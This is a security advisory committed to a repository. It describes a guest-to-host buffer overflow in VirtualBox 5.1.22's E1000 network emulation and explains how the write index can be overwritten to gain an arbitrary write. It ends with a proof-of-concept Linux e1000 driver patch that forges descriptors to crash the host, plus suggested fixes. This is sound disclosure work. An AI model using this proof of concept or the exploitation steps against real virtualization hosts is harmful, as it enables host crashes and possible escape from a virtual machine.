doc files without kernel deb packages
Lucas Molas committed on Sep 25, 2017
commit 49585eb
Showing 3 changed files with 404 additions and 0 deletions.

***************************************
VirtualBox E1000 device buffer overflow
***************************************


Introduction
============

The following document details a bug present in the latest VirtualBox release (v5.1.22), in the guest device emulation component ``DevE1000`` (*Intel 82540EM Ethernet Controller Emulation*), in the function ``e1kFallbackAddToFrame``, which leads to a buffer overflow in the host when the guest OS is controlled by an attacker.

The vulnerability was corroborated with both a Linux (Ubuntu 16.04) and a Windows (v8.1) host running a Linux (also Ubuntu 16.04) guest, but it could be triggered in many different host/guest combinations. In all scenarios the default network configuration is assumed: a single network adapter **attached to NAT** of type **Intel PRO/1000 MT Desktop (82540EM)**.

Since control structures (including function pointers) can be overwritten with attacker-controlled data, it is safe to assume that remote code execution could be achieved in many scenarios.


Bug description and exploitation
================================

The VirtualBox code that emulates the Intel 82540EM Ethernet Controller, in ``src/VBox/Devices/Network/DevE1000.cpp``, implements part of the hardware TCP segmentation (TSE) functionality in the function ``e1kFallbackAddToFrame()``:

.. code-block:: c

   static int e1kFallbackAddToFrame(PE1KSTATE pThis, E1KTXDESC *pDesc,
                                    bool fOnWorkerThread)
   {
   #ifdef VBOX_STRICT
       PPDMSCATTERGATHER pTxSg = pThis->CTX_SUFF(pTxSg);
       Assert(e1kGetDescType(pDesc) == E1K_DTYP_DATA);
       Assert(pDesc->data.cmd.fTSE);
       Assert(!e1kXmitIsGsoBuf(pTxSg));
   #endif
       uint16_t u16MaxPktLen = pThis->contextTSE.dw3.u8HDRLEN +
                               pThis->contextTSE.dw3.u16MSS;
       Assert(u16MaxPktLen != 0);
       Assert(u16MaxPktLen < E1K_MAX_TX_PKT_SIZE);

This function correctly checks that the maximum TX packet length (``u16MaxPktLen``) stays below the standard maximum of 16288 bytes (``E1K_MAX_TX_PKT_SIZE``), but does so with an ``Assert()`` macro that is disabled in a release build, effectively leaving the check useless for the end user. This contrasts with the analogous function ``e1kAddToFrame()``, which enforces the check with an explicit ``if`` instead of the ``Assert()``:

.. code-block:: c

   static bool e1kAddToFrame(PE1KSTATE pThis, RTGCPHYS PhysAddr,
                             uint32_t cbFragment)
   {
       PPDMSCATTERGATHER pTxSg = pThis->CTX_SUFF(pTxSg);
       bool const fGso = e1kXmitIsGsoBuf(pTxSg);
       uint32_t const cbNewPkt = cbFragment + pThis->u16TxPktLen;
       if (RT_UNLIKELY( !fGso && cbNewPkt > E1K_MAX_TX_PKT_SIZE ))
       {
           E1kLog(("%s Transmit packet is too large: %u > %u(max)\n",
                   pThis->szPrf, cbNewPkt, E1K_MAX_TX_PKT_SIZE));
           return false;
       }
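
To see concretely why an ``Assert()``-only check is not enough, consider the following minimal standalone sketch. It uses the standard ``assert()`` macro rather than VirtualBox's ``Assert()`` (which is governed by VirtualBox's own debug/strict build configuration rather than ``NDEBUG``), but the effect is analogous: in a release-style build the only bound on the packet length simply vanishes.

.. code-block:: c

   /* Illustrative sketch only (not VirtualBox code): compiled normally the
    * assertion aborts, but compiled with -DNDEBUG (a "release" build) the
    * check disappears and execution continues with the oversized length. */
   #include <assert.h>
   #include <stdint.h>
   #include <stdio.h>

   #define E1K_MAX_TX_PKT_SIZE 16288u

   int main(void)
   {
       uint16_t u16MaxPktLen = 50054;  /* attacker-chosen HDRLEN + MSS */

       assert(u16MaxPktLen < E1K_MAX_TX_PKT_SIZE);  /* compiled out with NDEBUG */
       printf("proceeding with u16MaxPktLen=%u\n", (unsigned)u16MaxPktLen);
       return 0;
   }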

The choice between the normal function and the fallback (made in ``e1kXmitDesc()``) depends on two factors: the TSE flag must be set in the data descriptors (controlled by the guest) and GSO must be disabled. The latter depends on many conditions, and hence there are many ways to disable it, but the most convenient is to enable loopback mode, which is configured through the Receive Control Register (the ``RCTL.LBM`` bits), also controlled by the guest OS.
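
For illustration, the guest-side write that enables loopback mode could look roughly like the sketch below. This is not code taken from the attached PoC; the constants mirror ``E1000_RCTL`` and ``E1000_RCTL_LBM_TCVR`` from the Linux e1000 driver (the PoC patch below reuses the latter), and how the guest obtains the MMIO mapping of the device registers is assumed and left out.

.. code-block:: c

   #include <stdint.h>

   /* Sketch: guest-controlled write that puts the emulated 82540EM into
    * transceiver loopback mode, steering VirtualBox onto the non-GSO
    * fallback path. Obtaining 'mmio' (the BAR0 mapping) is out of scope. */
   #define E1000_RCTL           0x00100u     /* Receive Control Register offset */
   #define E1000_RCTL_LBM_TCVR  0x000000C0u  /* RCTL.LBM = 11b (transceiver loopback) */

   static void e1k_enable_loopback(volatile uint8_t *mmio)
   {
       volatile uint32_t *rctl = (volatile uint32_t *)(mmio + E1000_RCTL);

       *rctl |= E1000_RCTL_LBM_TCVR;
   }

In the attached PoC this is instead done from inside the driver itself, by OR-ing ``E1000_RCTL_LBM_TCVR`` into ``rctl`` in ``e1000_setup_rctl()`` (see the patch below).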

Enabling loopback mode makes ``e1kXmitAllocBuf()`` use the ``aTxPacketFallback`` buffer (*Transmit packet buffer use for TSE fallback and loopback*) for the allocation of the PDM scatter/gather buffer, with the aforementioned length of 16288 bytes (``E1K_MAX_TX_PKT_SIZE``), and signals that GSO is disabled by setting ``pvUser`` to ``NULL``:

.. code-block:: c

   if (RT_LIKELY(GET_BITS(RCTL, LBM) != RCTL_LBM_TCVR))
   {
       ...
   }
   else
   {
       /* Create a loopback using the fallback buffer and preallocated SG. */
       AssertCompileMemberSize(E1KSTATE, uTxFallback.Sg, 8 * sizeof(size_t));
       pSg = &pThis->uTxFallback.Sg;
       pSg->fFlags = PDMSCATTERGATHER_FLAGS_MAGIC |
                     PDMSCATTERGATHER_FLAGS_OWNER_3;
       pSg->cbUsed = 0;
       pSg->cbAvailable = 0;
       pSg->pvAllocator = pThis;
       pSg->pvUser = NULL; /* No GSO here. */
       pSg->cSegs = 1;
       pSg->aSegs[0].pvSeg = pThis->aTxPacketFallback;
       pSg->aSegs[0].cbSeg = sizeof(pThis->aTxPacketFallback);
   }

This makes the call to ``e1kXmitIsGsoBuf()`` (inside ``e1kXmitDesc()``) return ``false`` and, with TSE enabled in the data descriptor, the execution flow goes to ``e1kFallbackAddToFrame()`` instead of the safer ``e1kAddToFrame()`` with the correct check:

.. code-block:: c

   /*
    * Add the descriptor data to the frame. If the frame is complete,
    * transmit it and reset the u16TxPktLen field.
    */
   if (e1kXmitIsGsoBuf(pThis->CTX_SUFF(pTxSg)))
   {
       ...
   }
   else if (!pDesc->data.cmd.fTSE)
   {
       ...
   }
   else
   {
       STAM_COUNTER_INC(&pThis->StatTxPathFallback);
       rc = e1kFallbackAddToFrame(pThis, pDesc, fOnWorkerThread);
   }

Inside ``e1kFallbackAddToFrame()``, with the aforementioned check disabled in a release build, the MSS can be set arbitrarily large (up to 64K minus the ``HDRLEN``), hence allowing an arbitrarily large ``DTALEN`` to be passed to ``e1kFallbackAddSegment()``:

.. code-block:: c

   /*
    * Carve out segments.
    */
   int rc;
   do
   {
       /* Calculate how many bytes we have left in this TCP segment */
       uint32_t cb = u16MaxPktLen - pThis->u16TxPktLen;
       if (cb > pDesc->data.cmd.u20DTALEN)
       {
           /* This descriptor fits completely into current segment */
           cb = pDesc->data.cmd.u20DTALEN;
           rc = e1kFallbackAddSegment(pThis, pDesc->data.u64BufAddr, cb,
                                      pDesc->data.cmd.fEOP /*fSend*/, fOnWorkerThread);
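
To put numbers on this, the following standalone sketch (not VirtualBox code; the variable names mirror the quoted snippets and the concrete ``HDRLEN``/``MSS`` values are arbitrary examples) shows how far ``cb`` can exceed the 16288-byte fallback buffer once the ``Assert()`` is compiled out:

.. code-block:: c

   #include <stdint.h>
   #include <stdio.h>

   #define E1K_MAX_TX_PKT_SIZE 16288u

   int main(void)
   {
       uint8_t  u8HDRLEN     = 54;     /* e.g. Ethernet + IP + TCP headers */
       uint16_t u16MSS       = 50000;  /* attacker-chosen MSS from the context descriptor */
       uint16_t u16TxPktLen  = 0;      /* nothing written into the frame yet */
       uint16_t u16MaxPktLen = (uint16_t)(u8HDRLEN + u16MSS);

       /* Same expression as in the quoted loop; in the real code cb may then
        * be clamped to DTALEN, which the guest also controls (up to 2^20-1). */
       uint32_t cb = (uint32_t)(u16MaxPktLen - u16TxPktLen);

       printf("u16MaxPktLen = %u (limit: %u)\n", (unsigned)u16MaxPktLen, E1K_MAX_TX_PKT_SIZE);
       printf("cb passed to e1kFallbackAddSegment() = %u\n", (unsigned)cb);
       printf("bytes written past aTxPacketFallback[16288] = %u\n",
              (unsigned)(cb > E1K_MAX_TX_PKT_SIZE ? cb - E1K_MAX_TX_PKT_SIZE : 0));
       return 0;
   }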

The function ``e1kFallbackAddSegment()`` then uses this value (received as the argument ``u16Len``) to copy from guest memory into the ``aTxPacketFallback`` buffer in host memory (through ``PDMDevHlpPhysRead()``) without any further check on the length, thus causing the buffer overflow (a buffer with a capacity of 16288 bytes written with up to 64K of data):

.. code-block:: c

   static int e1kFallbackAddSegment(PE1KSTATE pThis, RTGCPHYS PhysAddr,
                                    uint16_t u16Len, bool fSend, bool fOnWorkerThread)
   {
       int rc = VINF_SUCCESS;
       /* TCP header being transmitted */
       struct E1kTcpHeader *pTcpHdr = (struct E1kTcpHeader *)
               (pThis->aTxPacketFallback + pThis->contextTSE.tu.u8CSS);
       /* IP header being transmitted */
       struct E1kIpHeader *pIpHdr = (struct E1kIpHeader *)
               (pThis->aTxPacketFallback + pThis->contextTSE.ip.u8CSS);
       E1kLog3(("%s e1kFallbackAddSegment: Length=%x, remaining payload=%x, "
                "header=%x, send=%RTbool\n", pThis->szPrf, u16Len,
                pThis->u32PayRemain, pThis->u16HdrRemain, fSend));
       Assert(pThis->u32PayRemain + pThis->u16HdrRemain > 0);
       PDMDevHlpPhysRead(pThis->CTX_SUFF(pDevIns), PhysAddr,
                         pThis->aTxPacketFallback + pThis->u16TxPktLen, u16Len);

An important detail makes this vulnerability more amenable to RCE: the variable placed right after the buffer is its write index (``u16TxPktLen``), which is used as the offset into the buffer passed to ``PDMDevHlpPhysRead()``. Controlling this value with an initial overflow (caused by a first data descriptor of length ``E1K_MAX_TX_PKT_SIZE`` + 2 bytes) then allows a second data descriptor (through a second call to ``PDMDevHlpPhysRead()``) to write to any address up to 64K past the buffer, without having to overwrite all the memory in between (which would complicate the attack and risk a crash).
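
The following standalone sketch is an illustrative model only (the real ``E1KSTATE`` contains many more fields, and padding is not reproduced); it shows why a first overflow of ``E1K_MAX_TX_PKT_SIZE`` + 2 bytes is enough to take control of the offset used by the second copy:

.. code-block:: c

   #include <stddef.h>
   #include <stdint.h>
   #include <stdio.h>

   #define E1K_MAX_TX_PKT_SIZE 16288u

   /* Simplified model of the relevant part of the device state: the write
    * index sits directly after the fallback buffer, as described above. */
   struct e1k_model
   {
       uint8_t  aTxPacketFallback[E1K_MAX_TX_PKT_SIZE];
       uint16_t u16TxPktLen;  /* offset used for the next PDMDevHlpPhysRead() */
   };

   int main(void)
   {
       /* A first data descriptor of E1K_MAX_TX_PKT_SIZE + 2 bytes covers
        * exactly the two bytes of u16TxPktLen, so its value ends up being
        * chosen by the attacker. */
       printf("offsetof(u16TxPktLen) = %zu\n",
              offsetof(struct e1k_model, u16TxPktLen));

       /* The second descriptor is then copied to
        * aTxPacketFallback + u16TxPktLen, i.e. anywhere within ~64K of the
        * buffer, without touching the memory in between. */
       uint16_t forged_index = 0x8000;  /* example value written by the first overflow */
       printf("second copy starts %u bytes past the buffer start\n",
              (unsigned)forged_index);
       return 0;
   }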

A (minor) complication in this attack vector is worth mentioning for completeness: there is what seems to be a bug in ``e1kXmitAllocBuf()``, where in the loopback case ``cbTxAlloc`` (*Number of bytes in next packet*) is not reset to zero, as is done in the normal case (the other branch of its ``if``). This causes the thread to get stuck in the ``while`` loop over ``e1kLocateTxPacket()`` inside ``e1kXmitPending()``:

.. code-block:: c

   while (e1kLocateTxPacket(pThis))
   {
       fIncomplete = false;
       /* Found a complete packet, allocate it. */
       rc = e1kXmitAllocBuf(pThis, pThis->fGSO);
       /* If we're out of bandwidth we'll come back later. */
       if (RT_FAILURE(rc))
           goto out;
       /* Copy the packet to allocated buffer and send it. */
       rc = e1kXmitPacket(pThis, fOnWorkerThread);
       /* If we're out of bandwidth we'll come back later. */
       if (RT_FAILURE(rc))
           goto out;
   }

This seems to happen because ``e1kLocateTxPacket()`` prematurely returns ``true`` when ``cbTxAlloc`` is not zero, and never reaches the code that checks whether ``iTxDCurrent`` equals ``nTxDFetched`` (the usual case once all descriptors have been processed), which would normally make the function return ``false`` and terminate the aforementioned loop:

.. code-block:: c

   static bool e1kLocateTxPacket(PE1KSTATE pThis)
   {
       LogFlow(("%s e1kLocateTxPacket: ENTER cbTxAlloc=%d\n",
                pThis->szPrf, pThis->cbTxAlloc));
       /* Check if we have located the packet already. */
       if (pThis->cbTxAlloc)
       {
           LogFlow(("%s e1kLocateTxPacket: RET true cbTxAlloc=%d\n",
                    pThis->szPrf, pThis->cbTxAlloc));
           return true;
       }
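
For completeness, here is a sketch of the kind of reset the loopback branch of ``e1kXmitAllocBuf()`` (quoted earlier) appears to be missing. It merely mirrors what, per the description above, the non-loopback branch already does; it is not a patch taken from VirtualBox and it does not address the overflow itself:

.. code-block:: c

   else
   {
       /* Create a loopback using the fallback buffer and preallocated SG. */
       ...
       pSg->aSegs[0].pvSeg = pThis->aTxPacketFallback;
       pSg->aSegs[0].cbSeg = sizeof(pThis->aTxPacketFallback);
       pThis->cbTxAlloc = 0;  /* sketch: reset as in the other branch, so that
                                 e1kLocateTxPacket() does not return early */
   }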

In practice this translates into the requirement that the first packet sent to the device (after enabling loopback mode) must be the one that triggers the overflow; otherwise the VM hangs (ending in a DoS rather than an RCE).


Proof of concept
================

Because the setup of the network device is far from trivial, and to avoid building a custom driver for it, the E1000 driver of a generic Linux kernel was modified to generate the descriptors (both context and data) that trigger the overflow. This modified kernel is attached to this report as a PoC of the vulnerability; it has been tested in an Ubuntu 16.04 guest and causes a crash on both Linux and Windows hosts.


Possible solutions
==================

The main solution to this issue is to convert the ``Assert()`` checks in ``e1kFallbackAddToFrame()`` into explicit ``if`` statements that remain active in a release build, similar to what is done in ``e1kAddToFrame()``.
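
A sketch of what that could look like is shown below, modelled on the ``if`` in ``e1kAddToFrame()`` quoted above; the status code returned on failure is a placeholder, and this is not an official VirtualBox patch:

.. code-block:: c

   uint16_t u16MaxPktLen = pThis->contextTSE.dw3.u8HDRLEN +
                           pThis->contextTSE.dw3.u16MSS;
   /* Enforce, in all builds, the same conditions the Assert() calls express. */
   if (RT_UNLIKELY(u16MaxPktLen == 0 || u16MaxPktLen >= E1K_MAX_TX_PKT_SIZE))
   {
       E1kLog(("%s TSE transmit packet is too large: %u >= %u(max)\n",
               pThis->szPrf, u16MaxPktLen, E1K_MAX_TX_PKT_SIZE));
       return VERR_INVALID_PARAMETER;  /* placeholder status code */
   }

How the caller should react to the failure (drop the frame, raise an error interrupt, etc.) is left open here.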

Additional (defensive) checks could also be placed in ``e1kFallbackAddSegment()`` (and similarly in ``e1kAddToFrame()``) before the call to ``PDMDevHlpPhysRead()``, to explicitly verify that guest-controlled lengths cannot overflow any host buffer.
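
For instance (again only a sketch with a placeholder status code), ``e1kFallbackAddSegment()`` could verify that the copy stays within ``aTxPacketFallback`` before reading guest memory:

.. code-block:: c

   /* Sketch: bound the copy to the capacity of the host-side buffer before
    * calling PDMDevHlpPhysRead(). */
   if (RT_UNLIKELY((uint32_t)pThis->u16TxPktLen + u16Len >
                   sizeof(pThis->aTxPacketFallback)))
       return VERR_INVALID_PARAMETER;  /* placeholder status code */

   PDMDevHlpPhysRead(pThis->CTX_SUFF(pDevIns), PhysAddr,
                     pThis->aTxPacketFallback + pThis->u16TxPktLen, u16Len);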

From 1aa5b773716e6dd5fc7ea240b5808ababc168851 Mon Sep 17 00:00:00 2001
From: Lucas Molas <>
Date: Tue, 25 Apr 2017 18:42:45 -0300
Subject: [PATCH] e1k buffer overflow poc

---
 drivers/net/ethernet/intel/e1000/e1000_main.c | 76 +++++++++++++++++++++++++++
 1 file changed, 76 insertions(+)

diff --git a/drivers/net/ethernet/intel/e1000/e1000_main.c b/drivers/net/ethernet/intel/e1000/e1000_main.c
index f42129d..b8c6aac 100644
--- a/drivers/net/ethernet/intel/e1000/e1000_main.c
+++ b/drivers/net/ethernet/intel/e1000/e1000_main.c
@@ -32,6 +32,7 @@
 #include <linux/prefetch.h>
 #include <linux/bitops.h>
 #include <linux/if_vlan.h>
+#include <linux/printk.h>

 char e1000_driver_name[] = "e1000";
 static char e1000_driver_string[] = "Intel(R) PRO/1000 Network Driver";
@@ -39,6 +40,8 @@ static char e1000_driver_string[] = "Intel(R) PRO/1000 Network Driver";
 const char e1000_driver_version[] = DRV_VERSION;
 static const char e1000_copyright[] = "Copyright (c) 1999-2006 Intel Corporation.";

+#define VBOX_BUFFER_OVERFLOW_POC
+
 /* e1000_pci_tbl - PCI Device ID Table
  *
  * Last entry must be all 0s
@@ -1797,6 +1800,14 @@ static void e1000_setup_rctl(struct e1000_adapter *adapter)
                E1000_RCTL_RDMTS_HALF |
                (hw->mc_filter_type << E1000_RCTL_MO_SHIFT);

+#ifdef VBOX_BUFFER_OVERFLOW_POC
+
+        rctl |= E1000_RCTL_BAM | E1000_RCTL_LBM_TCVR |
+                E1000_RCTL_RDMTS_HALF |
+                (hw->mc_filter_type << E1000_RCTL_MO_SHIFT);
+
+#endif /* VBOX_BUFFER_OVERFLOW_POC */
+
         if (hw->tbi_compatibility_on == 1)
                 rctl |= E1000_RCTL_SBP;
         else
@@ -1844,6 +1855,8 @@ static void e1000_setup_rctl(struct e1000_adapter *adapter)
          */
         }

+        printk(KERN_WARNING "VBOX: e1000_setup_rctl: Writing to RCTL: %x\n", rctl);
+
         ew32(RCTL, rctl);
 }

@@ -2815,6 +2828,45 @@ static bool e1000_tx_csum(struct e1000_adapter *adapter,
         context_desc->tcp_seg_setup.data = 0;
         context_desc->cmd_and_length = cpu_to_le32(cmd_len);

+#ifdef VBOX_BUFFER_OVERFLOW_POC
+
+        #define FAKE_PAYLEN_VALUE (50 * 1000)
+        #define FAKE_MSS_VALUE FAKE_PAYLEN_VALUE
+
+        /* Taken from e1000_tso() */
+        u32 cmd_length = 0;
+        u16 ipcse = 0, tucse, mss;
+        u8 ipcss, ipcso, tucss, tucso, hdr_len;
+
+        hdr_len = skb_transport_offset(skb) + tcp_hdrlen(skb);
+        mss = FAKE_MSS_VALUE;
+
+        ipcse = 0;
+
+        ipcss = skb_network_offset(skb);
+        ipcso = (void *)&(ip_hdr(skb)->check) - (void *)skb->data;
+        tucss = skb_transport_offset(skb);
+        tucso = (void *)&(tcp_hdr(skb)->check) - (void *)skb->data;
+        tucse = 0;
+
+
+        cmd_length |= (E1000_TXD_CMD_DEXT | E1000_TXD_CMD_TSE |
+                       E1000_TXD_CMD_TCP | FAKE_PAYLEN_VALUE);
+
+        context_desc->lower_setup.ip_fields.ipcss = ipcss;
+        context_desc->lower_setup.ip_fields.ipcso = ipcso;
+        context_desc->lower_setup.ip_fields.ipcse = cpu_to_le16(ipcse);
+        context_desc->upper_setup.tcp_fields.tucss = tucss;
+        context_desc->upper_setup.tcp_fields.tucso = tucso;
+        context_desc->upper_setup.tcp_fields.tucse = cpu_to_le16(tucse);
+        context_desc->tcp_seg_setup.fields.mss = cpu_to_le16(mss);
+        context_desc->tcp_seg_setup.fields.hdr_len = hdr_len;
+        context_desc->cmd_and_length = cpu_to_le32(cmd_length);
+        /* End of extraction from e1000_tso() */
+
+#endif /* VBOX_BUFFER_OVERFLOW_POC */
+
+
         buffer_info->time_stamp = jiffies;
         buffer_info->next_to_watch = i;

@@ -3008,6 +3060,18 @@ static void e1000_tx_queue(struct e1000_adapter *adapter,
         if (unlikely(tx_flags & E1000_TX_FLAGS_NO_FCS))
                 txd_lower &= ~(E1000_TXD_CMD_IFCS);

+#ifdef VBOX_BUFFER_OVERFLOW_POC
+
+        if ((txd_lower & E1000_TXD_CMD_DEXT) == 0)
+                return;
+        /* Skip legacy packets, they can't trigger the overflow,
+         * and the first descriptor that VBox receives has to be
+         * the one that causes the overflow (due to the bug in
+         * the loopback mode memory allocation).
+         */
+
+#endif /* VBOX_BUFFER_OVERFLOW_POC */
+
         i = tx_ring->next_to_use;

         while (count--) {
@@ -3016,6 +3080,14 @@ static void e1000_tx_queue(struct e1000_adapter *adapter,
                 tx_desc->buffer_addr = cpu_to_le64(buffer_info->dma);
                 tx_desc->lower.data =
                         cpu_to_le32(txd_lower | buffer_info->length);
+
+#ifdef VBOX_BUFFER_OVERFLOW_POC
+
+                tx_desc->lower.data =
+                        cpu_to_le32(txd_lower | E1000_TXD_CMD_TSE | FAKE_PAYLEN_VALUE);
+
+#endif /* VBOX_BUFFER_OVERFLOW_POC */
+
                 tx_desc->upper.data = cpu_to_le32(txd_upper);
                 if (unlikely(++i == tx_ring->count))
                         i = 0;
@@ -3139,6 +3211,7 @@ static netdev_tx_t e1000_xmit_frame(struct sk_buff *skb,
                 return NETDEV_TX_OK;

         mss = skb_shinfo(skb)->gso_size;
+        printk(KERN_WARNING "VBOX: e1000_xmit_frame: mss = skb_shinfo(skb)->gso_size = %u\n", mss);
         /* The controller does a simple calculation to
          * make sure there is enough room in the FIFO before
          * initiating the DMA for each buffer. The calc is:
@@ -3182,6 +3255,8 @@ static netdev_tx_t e1000_xmit_frame(struct sk_buff *skb,
                         }
                 }
         }
+        printk(KERN_WARNING "VBOX: e1000_xmit_frame: mss after manipulation: %u\n", mss);
+

         /* reserve a descriptor for the offload context */
         if ((mss) || (skb->ip_summed == CHECKSUM_PARTIAL))
@@ -3234,6 +3309,7 @@ static netdev_tx_t e1000_xmit_frame(struct sk_buff *skb,
         first = tx_ring->next_to_use;

         tso = e1000_tso(adapter, tx_ring, skb, protocol);
+        printk(KERN_WARNING "VBOX: e1000_xmit_frame: e1000_tso: %d\n", tso);
         if (tso < 0) {
                 dev_kfree_skb_any(skb);
                 return NETDEV_TX_OK;
--
2.7.4